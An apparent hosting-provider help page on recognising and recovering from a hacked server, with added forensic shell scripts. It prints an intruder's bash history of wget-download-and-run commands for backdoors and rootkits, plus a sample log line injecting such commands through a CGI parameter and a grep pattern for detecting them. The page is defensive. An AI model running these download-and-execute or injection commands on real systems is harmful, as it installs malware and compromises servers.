Hacked machine

It doesn't only happen to others.

How to see that a machine is hacked?

A look at the MRTG traffic graphs leaves no doubt:

(MRTG graph not reproduced here)

And on the machine, we find:

root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]

root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400


The attacker has clearly been able to run programs as root. The machine is therefore compromised and must be reinstalled from clean media: once root has been taken, no binary, library or log on the disk can be trusted.

# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823


There are running processes that have a PID (netstat shows 28823 owning three UDP sockets) but that ps does not display. Most likely ps has been replaced by a trojaned copy that filters out the attacker's processes to deceive the eye. A quick cross-check on a suspect machine is to compare the numeric entries in /proc with the PIDs reported by a ps binary taken from known-good media: a user-space rootkit that swaps ps cannot hide a process from /proc, although a kernel-level rootkit can.
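As an added example (not part of the original page), here is a small POSIX shell script that automates that cross-check: it extracts the PIDs netstat -p reports as socket owners, the PIDs ps lists, and the PIDs the kernel exposes in /proc, then prints those present in one view but missing from ps. The netstat and ps sample text is constructed from the listing above plus one invented sshd line; the function names are the example's own.

```shell
#!/bin/sh
# Added example (not from the original page): cross-check three views of the
# process table. netstat -p names the PID that owns each socket, ps lists what
# the (possibly trojaned) ps binary is willing to show, and /proc is the
# kernel's own list. A PID that owns a socket or exists in /proc but is absent
# from ps is a strong sign of a user-space rootkit such as a filtering ps.

# Sample output constructed from the page's own netstat/ps listing plus one
# benign sshd line; it is not a live capture.
NETSTAT_SAMPLE='Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 612/sshd'

PS_SAMPLE='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 612 0.0 0.5 2100 900 ? S 10:00 0:00 /usr/sbin/sshd
root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823'

# PIDs owning sockets: the last field of a netstat -p line looks like "28823/xc".
netstat_pids() {
    printf '%s\n' "$1" | awk '$NF ~ /^[0-9]+\// { split($NF, a, "/"); print a[1] }' | sort -un
}

# PIDs from "ps aux"-style output: the second field of every non-header line.
ps_pids() {
    printf '%s\n' "$1" | awk 'NR > 1 && $2 ~ /^[0-9]+$/ { print $2 }' | sort -un
}

# PIDs the kernel exposes as numeric directories in /proc (Linux only).
proc_pids() {
    for d in /proc/[0-9]*; do
        [ -d "$d" ] && printf '%s\n' "${d#/proc/}"
    done | sort -un
}

# Lines of list $1 that do not occur in list $2 (both newline-separated).
# Both lists go through one awk run with a marker between them, so no
# temporary files are needed and an empty list is handled correctly.
missing_from() {
    { printf '%s\n' "$2"; echo '---'; printf '%s\n' "$1"; } |
        awk '$0 == "---" { second = 1; next }
             !second     { seen[$0] = 1; next }
             $0 != "" && !($0 in seen)'
}

# Socket owners that ps does not show: the page's 28823/xc case.
hidden_from_ps() {
    missing_from "$(netstat_pids "$1")" "$(ps_pids "$2")"
}

# Live variant for the current host. Run it with a ps copied from known-good
# media (the ps on the suspect machine is exactly what is in doubt), and run it
# twice: a process that exits between the two snapshots is a false positive.
# A kernel-level rootkit can also falsify /proc, so a clean result is not proof.
live_hidden_from_ps() {
    missing_from "$(proc_pids)" "$(ps -e -o pid= | tr -d ' ')"
}

echo "Socket owners invisible to ps (sample data):"
hidden_from_ps "$NETSTAT_SAMPLE" "$PS_SAMPLE"
```

On the sample data the script prints 28823, the PID netstat attributes to xc and ps never shows. Note that netstat itself may also have been replaced; the /proc comparison with a clean ps is the more reliable of the two checks.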

# halt

Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...

The system is going down for system halt NOW !!

We stop the machine immediately. (Halting discards volatile evidence such as the process list and open connections; if the intrusion is to be investigated rather than simply wiped, record those first.)

With luck, the machine is only partly compromised: see SemiHackedMachine.

Another case: HackedMachineExample.

Why is the machine hacked?

The causes are many, but they can be summed up in one sentence:
you are not paranoid enough.

You use telnet: your login and password cross the Internet in clear text and can be captured at any time. Use SSH instead; see SshOnDedicated.

You use FTP: your login and password cross the Internet in clear text, and it is the same password as root. Use SFTP instead.

You use POP3/IMAP with a clear-text password, and it is the root password. Use APOP or POP3S/IMAPS; see SmtpPop3Imap.

If you do not keep your server up to date with the releases (ReleasePatch), you are an easy target: about 250 scans a day are run against our network looking for security holes.

What to do?

If your server is hacked, it is placed in Rescue mode, which only provides read-only FTP access; you automatically receive the access code by email.

You can then submit an incident ticket concerning your machine in Rescue mode. You will have to explain your request and commit to fixing the problem before your server is reactivated. We will check that the flaws have been fixed before the server is put back on the network in normal (HDD) mode.


Hack examples

1. Vulnerable CGI script

Symptoms

A file g00dies.tgz uploaded to /tmp along with other files (x, k, etc.).
The program x is a backdoor: once launched, it gives the attacker access to the server.

We found the .bash_history of the nobody user in /tmp; here is its content:

cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth


Comments

The history shows that the commands were run as nobody, the user Apache runs as. The attacker most likely exploited a vulnerability in a CGI script.

Resolution

- Kill all suspicious running processes.
The attacker apparently did not obtain root (although on a kernel older than 2.4.24 he could have done so through a local kernel flaw);
we nevertheless carry out some basic operations and checks:

  • Change all passwords: root, users, mysql, mail, etc. (the history shows the attacker ran a program named mingetty, so assume credentials are compromised).
  • Search for files changed since the intrusion: find /dir -cmin -60 lists files whose inode status (ctime) changed in the last hour. Use -cmin rather than -mmin: an attacker can reset a file's modification time with touch, but ctime is set only by the kernel.

- Then go through the Apache access and error logs around the time of the intrusion to identify the vulnerable script.
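As an added example (not part of the original page), the following POSIX shell script carries out the two look-back steps of this resolution: listing files whose ctime changed in the last N minutes, and pulling the cgi-bin requests from an Apache combined log in a given time window, then keeping those whose URL carries shell metacharacters or the download-and-execute tools seen in the history above. The log lines, client addresses (198.51.100.9, 203.0.113.7), the download host www.example.com and the script name form.cgi are all constructed for the example; the function names are the example's own.

```shell
#!/bin/sh
# Added example (not from the original page): the two look-back steps of the
# resolution, (1) files changed since the intrusion and (2) the Apache requests
# that could have driven the vulnerable CGI script. Directory names, time
# window and log lines are assumptions made up for the example.

# (1) Files under DIR whose inode changed in the last MINUTES minutes.
# -cmin (ctime) rather than -mmin (mtime): an attacker can reset mtime with
# touch, but ctime is updated by the kernel on every inode change and cannot
# be set from user space without moving the system clock.
recently_changed() {
    find "$1" -xdev -type f -cmin "-$2" 2>/dev/null | sort
}

# Apache combined-log lines constructed for this example (not a real capture).
# The timestamps match the morning of the bash history above; 198.51.100.9 and
# www.example.com stand in for the attacker's host and download site.
ACCESS_LOG_SAMPLE='203.0.113.7 - - [20/Nov/2003:11:20:03 +0100] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
198.51.100.9 - - [20/Nov/2003:11:24:17 +0100] "GET /cgi-bin/form.cgi?name=x;cd%20/tmp;wget%20www.example.com/x;chmod%20%2Bx%20x;./x HTTP/1.0" 200 87 "-" "Wget/1.8"
203.0.113.7 - - [20/Nov/2003:11:25:40 +0100] "GET /cgi-bin/form.cgi?name=alice HTTP/1.1" 200 412 "-" "Mozilla/4.0"
198.51.100.9 - - [20/Nov/2003:13:02:11 +0100] "GET /cgi-bin/form.cgi?name=x;/tmp/x HTTP/1.0" 200 87 "-" "Wget/1.8"'

# (2a) cgi-bin requests logged between FROM and TO (HH:MM:SS, same day).
# The time is cut out of the "[20/Nov/2003:11:24:17 +0100]" field and
# compared as a string, which works because the format is fixed-width.
cgi_requests_between() {
    printf '%s\n' "$1" | awk -v from="$2" -v to="$3" '
        match($0, /:[0-9][0-9]:[0-9][0-9]:[0-9][0-9] /) {
            t = substr($0, RSTART + 1, 8)
            if (t >= from && t <= to && $0 ~ /\/cgi-bin\//) print
        }'
}

# (2b) Of those, requests whose URL carries shell metacharacters (raw or
# URL-encoded) or the download/execute tools seen in the attacker's history.
suspicious_cgi_requests() {
    cgi_requests_between "$1" "$2" "$3" |
        grep -iE ';|%3b|\||%7c|`|%60|\$\(|wget|chmod|/tmp|%2ftmp'
}

# (2c) Client addresses behind the suspicious requests: what to block and what
# to look for in the other logs (ftp, mail, syslog).
suspicious_clients() {
    suspicious_cgi_requests "$1" "$2" "$3" | awk '{ print $1 }' | sort -u
}

echo "Files changed under /tmp in the last 60 minutes:"
recently_changed /tmp 60
echo "Suspicious CGI requests between 11:00 and 12:00 (sample log):"
suspicious_cgi_requests "$ACCESS_LOG_SAMPLE" 11:00:00 11:59:59
echo "Clients to investigate:"
suspicious_clients "$ACCESS_LOG_SAMPLE" 00:00:00 23:59:59
```

On the sample log the 11:00 to 12:00 window yields the single request that chains cd, wget, chmod and ./x through the CGI parameter; widening the window to the whole day also catches the later call to /tmp/x. On a real server, run the log search on a copy of the logs and the find on the mounted disk from Rescue mode, so neither the attacker's binaries nor a trojaned find or grep are involved.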